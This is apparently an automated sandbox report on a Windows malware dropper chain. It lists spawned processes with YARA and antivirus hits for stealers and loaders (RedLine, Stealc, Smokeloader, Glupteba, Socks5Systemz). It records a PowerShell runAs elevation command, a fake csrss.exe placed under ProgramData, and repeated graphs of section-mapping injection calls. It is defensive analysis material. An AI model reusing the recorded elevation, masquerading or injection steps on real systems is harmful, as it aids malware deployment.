Commandline:"C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
Imagebase:0x400000
File size:709'120 bytes
MD5 hash:B0292A40F16BC3D5A1FE839FAC1C825A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Has exited:false

Target ID:23
Start time:12:12:31
Start date:05/02/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:12:12:31
Start date:05/02/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
Imagebase:0x410000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:12:12:32
Start date:05/02/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
Imagebase:0x410000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:12:12:34
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
Imagebase:0x400000
File size:3'047'424 bytes
MD5 hash:29DEB5EE2C07F1E8660E10AB6E4A0966
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:12:12:34
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\356F.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\356F.exe
Imagebase:0xfe0000
File size:9'104'384 bytes
MD5 hash:CEAE65EE17FF158877706EDFE2171501
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\356F.exe, Author: ditekSHen
Antivirus matches:
• Detection: 92%, ReversingLabs
Has exited:true

Target ID:28
Start time:12:12:35
Start date:05/02/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:12:12:35
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
Imagebase:0x400000
File size:3'047'424 bytes
MD5 hash:29DEB5EE2C07F1E8660E10AB6E4A0966
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:30
Start time:12:12:36
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Imagebase:0x400000
File size:4'315'536 bytes
MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 51%, ReversingLabs
Has exited:true

Target ID:31
Start time:12:12:36
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
Imagebase:0x400000
File size:2'123'218 bytes
MD5 hash:28B72E7425D6D224C060D3CF439C668C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 61%, ReversingLabs
Has exited:true

Target ID:32
Start time:12:12:36
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
Imagebase:0x7ff7d2c60000
File size:2'654'720 bytes
MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 88%, ReversingLabs
Has exited:true

Target ID:33
Start time:12:12:36
Start date:05/02/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:12:12:36
Start date:05/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:12:12:37
Start date:05/02/2024
Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Imagebase:0x400000
File size:4'979'200 bytes
MD5 hash:5E94F0F6265F9E8B2F706F1D46BBD39E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000023.00000000.2524392182.0000000000401000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
Antivirus matches:
• Detection: 21%, ReversingLabs
Has exited:false

Target ID:36
Start time:12:12:37
Start date:05/02/2024
Path:C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Drivers\csrss.exe"
Imagebase:0x400000
File size:1'998'848 bytes
MD5 hash:151E9EC4F0355D2F131B871671BD5E20
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Has exited:true

Target ID:37
Start time:12:12:38
Start date:05/02/2024
Path:C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Drivers\csrss.exe"
Imagebase:0x400000
File size:1'998'848 bytes
MD5 hash:151E9EC4F0355D2F131B871671BD5E20
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:12:12:41
Start date:05/02/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:12:12:41
Start date:05/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:12:12:43
Start date:05/02/2024
Path:C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):true
Commandline:chcp 1251
Imagebase:0x500000
File size:12'800 bytes
MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:43
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7d2c60000
                                                                                                                                                                                                                                                                                                                                                                File size:2'654'720 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                                                                                                                                Start time:12:12:43
                                                                                                                                                                                                                                                                                                                                                                Start date:05/02/2024
                                                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:327'680 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:7C0B88535C506FC8BEC1510F08F3329C
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2971930000.0000000000443000.00000040.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true


                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.8%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:35.8%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:56.8%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:81
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 179 401561-4015b2 call 4011cd 189 4015b4 179->189 190 4015b7-4015bc 179->190 189->190 192 4015c2-4015d3 190->192 193 4018df-4018e7 190->193 196 4015d9-401602 192->196 197 4018dd 192->197 193->190 198 4018ec-40193b call 4011cd 193->198 196->197 206 401608-40161f NtDuplicateObject 196->206 197->198 206->197 207 401625-401649 NtCreateSection 206->207 209 4016a5-4016cb NtCreateSection 207->209 210 40164b-40166c NtMapViewOfSection 207->210 209->197 213 4016d1-4016d5 209->213 210->209 212 40166e-40168a NtMapViewOfSection 210->212 212->209 215 40168c-4016a2 212->215 213->197 216 4016db-4016fc NtMapViewOfSection 213->216 215->209 216->197 218 401702-40171e NtMapViewOfSection 216->218 218->197 221 401724 218->221 221->197 223 401724 call 401729 221->223 223->197
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 239 4015d9-401602 235->239 240 4018dd 235->240 236->233 241 4018ec-40193b call 4011cd 236->241 239->240 249 401608-40161f NtDuplicateObject 239->249 240->241 249->240 250 401625-401649 NtCreateSection 249->250 252 4016a5-4016cb NtCreateSection 250->252 253 40164b-40166c NtMapViewOfSection 250->253 252->240 256 4016d1-4016d5 252->256 253->252 255 40166e-40168a NtMapViewOfSection 253->255 255->252 258 40168c-4016a2 255->258 256->240 259 4016db-4016fc NtMapViewOfSection 256->259 258->252 259->240 261 401702-40171e NtMapViewOfSection 259->261 261->240 264 401724 261->264 264->240 266 401724 call 401729 264->266 266->240
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 283 4015d9-401602 279->283 284 4018dd 279->284 280->277 285 4018ec-40193b call 4011cd 280->285 283->284 293 401608-40161f NtDuplicateObject 283->293 284->285 293->284 294 401625-401649 NtCreateSection 293->294 296 4016a5-4016cb NtCreateSection 294->296 297 40164b-40166c NtMapViewOfSection 294->297 296->284 300 4016d1-4016d5 296->300 297->296 299 40166e-40168a NtMapViewOfSection 297->299 299->296 302 40168c-4016a2 299->302 300->284 303 4016db-4016fc NtMapViewOfSection 300->303 302->296 303->284 305 401702-40171e NtMapViewOfSection 303->305 305->284 308 401724 305->308 308->284 310 401724 call 401729 308->310 310->284
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 322 4015d9-401602 318->322 323 4018dd 318->323 319->316 324 4018ec-40193b call 4011cd 319->324 322->323 332 401608-40161f NtDuplicateObject 322->332 323->324 332->323 333 401625-401649 NtCreateSection 332->333 335 4016a5-4016cb NtCreateSection 333->335 336 40164b-40166c NtMapViewOfSection 333->336 335->323 339 4016d1-4016d5 335->339 336->335 338 40166e-40168a NtMapViewOfSection 336->338 338->335 341 40168c-4016a2 338->341 339->323 342 4016db-4016fc NtMapViewOfSection 339->342 341->335 342->323 344 401702-40171e NtMapViewOfSection 342->344 344->323 347 401724 344->347 347->323 349 401724 call 401729 347->349 349->323
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
